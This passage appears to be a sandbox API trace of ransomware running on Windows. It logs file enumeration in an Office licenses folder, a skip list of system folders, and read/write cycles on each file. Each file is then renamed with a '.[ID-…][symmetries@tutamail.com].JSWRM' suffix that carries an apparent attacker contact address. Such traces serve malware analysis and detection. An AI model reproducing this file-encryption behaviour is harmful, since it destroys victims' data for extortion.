dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.721] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.721] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0111.721] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProVL_KMS_Client-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioprovl_kms_client-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.722] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11624) returned 1 [0111.722] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0111.722] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, lpOverlapped=0x0) returned 1 [0111.749] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.749] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0111.750] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.750] CloseHandle (hObject=0x45c) returned 1 [0111.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0111.750] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0111.750] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0111.750] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0111.750] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0111.750] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.750] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0111.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b8f8 [0111.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f5f8 [0111.750] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b8f8 | out: hHeap=0x1e0000) returned 1 [0111.750] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0111.750] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProVL_KMS_Client-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioprovl_kms_client-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProVL_KMS_Client-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioprovl_kms_client-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0111.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0111.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0111.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0111.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.752] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec2b21e6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xec2b21e6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xec39700f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2590, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioProVL_KMS_Client-ul.xrm-ms", cAlternateFileName="VI0753~1.XRM")) returned 1 [0111.752] lstrcmpiW (lpString1="VisioProVL_KMS_Client-ul.xrm-ms", lpString2=".") returned 1 [0111.752] lstrcmpiW (lpString1="VisioProVL_KMS_Client-ul.xrm-ms", lpString2="..") returned 1 [0111.752] lstrcmpiW (lpString1="VisioProVL_KMS_Client-ul.xrm-ms", lpString2="...") returned 1 [0111.752] lstrcmpiW (lpString1="VisioProVL_KMS_Client-ul.xrm-ms", lpString2="windows") returned -1 [0111.752] lstrcmpiW (lpString1="VisioProVL_KMS_Client-ul.xrm-ms", lpString2="recovery") returned 1 [0111.752] lstrcmpiW (lpString1="VisioProVL_KMS_Client-ul.xrm-ms", lpString2="perflogs") returned 1 [0111.752] lstrcmpiW (lpString1="VisioProVL_KMS_Client-ul.xrm-ms", lpString2="documents and settings") returned 1 [0111.752] lstrcmpiW (lpString1="VisioProVL_KMS_Client-ul.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.752] lstrcmpiW (lpString1="VisioProVL_KMS_Client-ul.xrm-ms", lpString2="system volume information") returned 1 [0111.752] lstrcmpiW (lpString1="VisioProVL_KMS_Client-ul.xrm-ms", lpString2="msocache") returned 1 [0111.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0111.752] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProVL_KMS_Client-ul.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0111.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0111.752] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProVL_KMS_Client-ul.xrm-ms", cchWideChar=31, lpMultiByteStr=0x240f48, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProVL_KMS_Client-ul.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0111.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0111.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0111.752] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProVL_KMS_Client-ul.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0111.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0111.752] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProVL_KMS_Client-ul.xrm-ms", cchWideChar=31, lpMultiByteStr=0x241268, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProVL_KMS_Client-ul.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0111.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0111.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0111.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0111.752] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.752] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0111.753] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProVL_KMS_Client-ul.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioprovl_kms_client-ul.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.753] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9616) returned 1 [0111.753] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2590) returned 0x24c1d0 [0111.753] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2590, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2590, lpOverlapped=0x0) returned 1 [0111.770] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.770] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2590, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2590, lpOverlapped=0x0) returned 1 [0111.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.770] CloseHandle (hObject=0x45c) returned 1 [0111.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0111.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0111.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0111.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0111.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0111.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0111.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e7a0 [0111.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0111.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.771] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProVL_KMS_Client-ul.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioprovl_kms_client-ul.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProVL_KMS_Client-ul.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioprovl_kms_client-ul.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0111.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0111.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0111.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0111.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0111.772] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec2b21e6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xec2b21e6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xec5ad0ff, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2987, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioProVL_MAK-pl.xrm-ms", cAlternateFileName="VIC5E1~1.XRM")) returned 1 [0111.772] lstrcmpiW (lpString1="VisioProVL_MAK-pl.xrm-ms", lpString2=".") returned 1 [0111.772] lstrcmpiW (lpString1="VisioProVL_MAK-pl.xrm-ms", lpString2="..") returned 1 [0111.773] lstrcmpiW (lpString1="VisioProVL_MAK-pl.xrm-ms", lpString2="...") returned 1 [0111.773] lstrcmpiW (lpString1="VisioProVL_MAK-pl.xrm-ms", lpString2="windows") returned -1 [0111.773] lstrcmpiW (lpString1="VisioProVL_MAK-pl.xrm-ms", lpString2="recovery") returned 1 [0111.773] lstrcmpiW (lpString1="VisioProVL_MAK-pl.xrm-ms", lpString2="perflogs") returned 1 [0111.773] lstrcmpiW (lpString1="VisioProVL_MAK-pl.xrm-ms", lpString2="documents and settings") returned 1 [0111.773] lstrcmpiW (lpString1="VisioProVL_MAK-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.773] lstrcmpiW (lpString1="VisioProVL_MAK-pl.xrm-ms", lpString2="system volume information") returned 1 [0111.773] lstrcmpiW (lpString1="VisioProVL_MAK-pl.xrm-ms", lpString2="msocache") returned 1 [0111.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0111.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProVL_MAK-pl.xrm-ms", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0111.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0111.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProVL_MAK-pl.xrm-ms", cchWideChar=24, lpMultiByteStr=0x241010, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProVL_MAK-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 24 [0111.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0111.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0111.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProVL_MAK-pl.xrm-ms", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0111.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0111.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProVL_MAK-pl.xrm-ms", cchWideChar=24, lpMultiByteStr=0x240f70, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProVL_MAK-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 24 [0111.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0111.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0111.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0111.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0111.773] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProVL_MAK-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioprovl_mak-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.774] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10631) returned 1 [0111.774] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2980) returned 0x24c1d0 [0111.774] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2980, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2980, lpOverlapped=0x0) returned 1 [0111.837] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.837] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2980, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2980, lpOverlapped=0x0) returned 1 [0111.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.837] CloseHandle (hObject=0x45c) returned 1 [0111.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0111.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0111.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0111.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0111.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0111.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0111.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0111.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0111.838] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProVL_MAK-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioprovl_mak-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProVL_MAK-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioprovl_mak-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0111.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0111.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0111.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0111.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0111.840] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec21989a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xec21989a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xec34ab5e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1a95, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioProVL_MAK-ppd.xrm-ms", cAlternateFileName="VID7A5~1.XRM")) returned 1 [0111.840] lstrcmpiW (lpString1="VisioProVL_MAK-ppd.xrm-ms", lpString2=".") returned 1 [0111.840] lstrcmpiW (lpString1="VisioProVL_MAK-ppd.xrm-ms", lpString2="..") returned 1 [0111.840] lstrcmpiW (lpString1="VisioProVL_MAK-ppd.xrm-ms", lpString2="...") returned 1 [0111.840] lstrcmpiW (lpString1="VisioProVL_MAK-ppd.xrm-ms", lpString2="windows") returned -1 [0111.840] lstrcmpiW (lpString1="VisioProVL_MAK-ppd.xrm-ms", lpString2="recovery") returned 1 [0111.840] lstrcmpiW (lpString1="VisioProVL_MAK-ppd.xrm-ms", lpString2="perflogs") returned 1 [0111.840] lstrcmpiW (lpString1="VisioProVL_MAK-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0111.840] lstrcmpiW (lpString1="VisioProVL_MAK-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.840] lstrcmpiW (lpString1="VisioProVL_MAK-ppd.xrm-ms", lpString2="system volume information") returned 1 [0111.840] lstrcmpiW (lpString1="VisioProVL_MAK-ppd.xrm-ms", lpString2="msocache") returned 1 [0111.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0111.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProVL_MAK-ppd.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0111.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0111.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProVL_MAK-ppd.xrm-ms", cchWideChar=25, lpMultiByteStr=0x241038, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProVL_MAK-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0111.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0111.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0111.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProVL_MAK-ppd.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0111.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0111.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 